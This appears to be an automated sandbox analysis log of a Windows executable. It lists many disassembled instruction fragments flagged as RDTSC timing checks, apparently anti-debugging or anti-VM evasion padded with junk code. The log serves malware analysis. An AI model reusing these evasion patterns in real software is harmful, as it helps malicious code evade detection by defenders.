Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1882F second address: D18836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D189B0 second address: D189D8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F127853B646h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F127853B652h 0x00000011 ja 00007F127853B664h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D189D8 second address: D189DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D18F60 second address: D18F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B7E4 second address: D1B844 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12792CFFB5h 0x00000008 jmp 00007F12792CFFAFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f add dword ptr [esp], 0C8B1EA4h 0x00000016 mov dword ptr [ebp+122D2951h], eax 0x0000001c push 00000003h 0x0000001e movsx ecx, dx 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D2F10h], edx 0x00000029 push 00000003h 0x0000002b mov esi, dword ptr [ebp+122D29CDh] 0x00000031 push C9B79B64h 0x00000036 pushad 0x00000037 jmp 00007F12792CFFB6h 0x0000003c pushad 0x0000003d jg 00007F12792CFFA6h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B844 second address: D1B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 09B79B64h 0x0000000d mov edi, 2AC2AAA4h 0x00000012 lea ebx, dword ptr [ebp+1244D625h] 0x00000018 pushad 0x00000019 sbb ecx, 33CED1EBh 0x0000001f mov edi, dword ptr [ebp+122D261Ah] 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 push ecx 0x00000028 jns 00007F127853B64Ch 0x0000002e jne 00007F127853B646h 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F127853B651h 0x0000003e jne 00007F127853B646h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B979 second address: D1B9DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 467BD4F8h 0x0000000d push 00000003h 0x0000000f and dx, A35Ah 0x00000014 push 00000000h 0x00000016 mov edx, dword ptr [ebp+122D341Bh] 0x0000001c mov edi, 3351FB8Bh 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D261Ah], edx 0x00000029 push 4E78C694h 0x0000002e jmp 00007F12792CFFB8h 0x00000033 add dword ptr [esp], 7187396Ch 0x0000003a mov cx, ax 0x0000003d lea ebx, dword ptr [ebp+1244D62Eh] 0x00000043 js 00007F12792CFFA8h 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push esi 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B9DE second address: D1B9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BB31 second address: D1BBC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov esi, 2BD6E900h 0x0000000f push 00000003h 0x00000011 push 00000000h 0x00000013 mov edx, ebx 0x00000015 push 00000003h 0x00000017 or cx, E7E3h 0x0000001c mov dword ptr [ebp+122D1CF0h], esi 0x00000022 push 72F6B4E8h 0x00000027 pushad 0x00000028 jmp 00007F12792CFFB4h 0x0000002d jmp 00007F12792CFFB0h 0x00000032 popad 0x00000033 add dword ptr [esp], 4D094B18h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F12792CFFA8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000016h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 push ecx 0x00000055 mov cl, 6Ch 0x00000057 pop esi 0x00000058 lea ebx, dword ptr [ebp+1244D639h] 0x0000005e movsx edi, bx 0x00000061 push eax 0x00000062 jnp 00007F12792CFFB4h 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1BBC8 second address: D1BBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2E9D0 second address: D2E9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12792CFFB5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A934 second address: D3A93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A93A second address: D3A945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A945 second address: D3A94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3A94A second address: D3A94F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AAAA second address: D3AABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F127853B64Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AC23 second address: D3AC29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AC29 second address: D3AC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F127853B64Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AC39 second address: D3AC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AC42 second address: D3AC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F127853B646h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3AC4E second address: D3AC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F12792CFFA6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B0DB second address: D3B0E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B0E0 second address: D3B0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B0E6 second address: D3B0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B3C0 second address: D3B3C6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B3C6 second address: D3B3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B55D second address: D3B57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F12792CFFB9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B57F second address: D3B598 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F127853B64Bh 0x0000000d jnc 00007F127853B646h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B9B1 second address: D3B9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B9BA second address: D3B9CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F127853B64Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3BB2C second address: D3BB3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F12792CFFA6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D050E2 second address: D050E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D050E6 second address: D050EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4434C second address: D44351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D44553 second address: D44557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47789 second address: D4778E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4778E second address: D47794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47794 second address: D477A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D477A1 second address: D477A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D478EE second address: D478F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E5D second address: D47E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E63 second address: D47E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E68 second address: D47E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47E70 second address: D47E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FC2 second address: D47FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FC6 second address: D47FD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F127853B646h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FD6 second address: D47FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FDA second address: D47FDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FDE second address: D47FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D47FE4 second address: D48006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F127853B656h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F127853B646h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48006 second address: D4800A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4800A second address: D4801C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F127853B646h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4801C second address: D48026 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12792CFFA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4947A second address: D4948B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jnp 00007F127853B650h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49A31 second address: D49A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12792CFFB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F12792CFFB2h 0x0000000e popad 0x0000000f push eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49B6A second address: D49B85 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F127853B648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F127853B64Ch 0x00000013 jbe 00007F127853B646h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A060 second address: D4A065 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A50B second address: D4A53C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F127853B655h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F127853B651h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A5F2 second address: D4A5F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AAD2 second address: D4AAD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B364 second address: D4B369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4CE26 second address: D4CE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4CE2A second address: D4CE35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F9CD second address: D4F9D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F9D1 second address: D4F9D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4F9D7 second address: D4F9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F127853B646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F234 second address: D0F24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F12792CFFAFh 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F24E second address: D0F252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F252 second address: D0F267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F12792CFFACh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5023E second address: D50243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50243 second address: D5024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F12792CFFA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D563B5 second address: D563BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D563BC second address: D563D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12792CFFB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5657C second address: D56605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 xor bx, 5B67h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F127853B648h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D341Fh] 0x0000003a mov eax, dword ptr [ebp+122D0F29h] 0x00000040 jg 00007F127853B64Ch 0x00000046 jmp 00007F127853B659h 0x0000004b push FFFFFFFFh 0x0000004d mov edi, dword ptr [ebp+122D1E50h] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F127853B64Eh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5A50C second address: D5A510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58695 second address: D58699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5A510 second address: D5A516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58699 second address: D5869F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D58777 second address: D5877B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5ADC8 second address: D5ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jp 00007F127853B64Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5ADD7 second address: D5ADE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5DC0B second address: D5DC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D609E2 second address: D60A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F12792CFFA8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 jmp 00007F12792CFFADh 0x00000028 jmp 00007F12792CFFADh 0x0000002d push 00000000h 0x0000002f cld 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F12792CFFA8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+124538BAh] 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007F12792CFFA6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A5B second address: D60A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A5F second address: D60A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D61AF1 second address: D61B5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F127853B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F127853B64Ch 0x00000010 jns 00007F127853B646h 0x00000016 popad 0x00000017 mov dword ptr [esp], eax 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F127853B648h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 clc 0x00000035 push 00000000h 0x00000037 mov ebx, ecx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F127853B648h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov edi, ecx 0x00000057 adc bx, BD72h 0x0000005c xchg eax, esi 0x0000005d push edi 0x0000005e push ecx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60CBD second address: D60CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5FBDD second address: D5FBE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64D77 second address: D64D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6DF4A second address: D6DF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
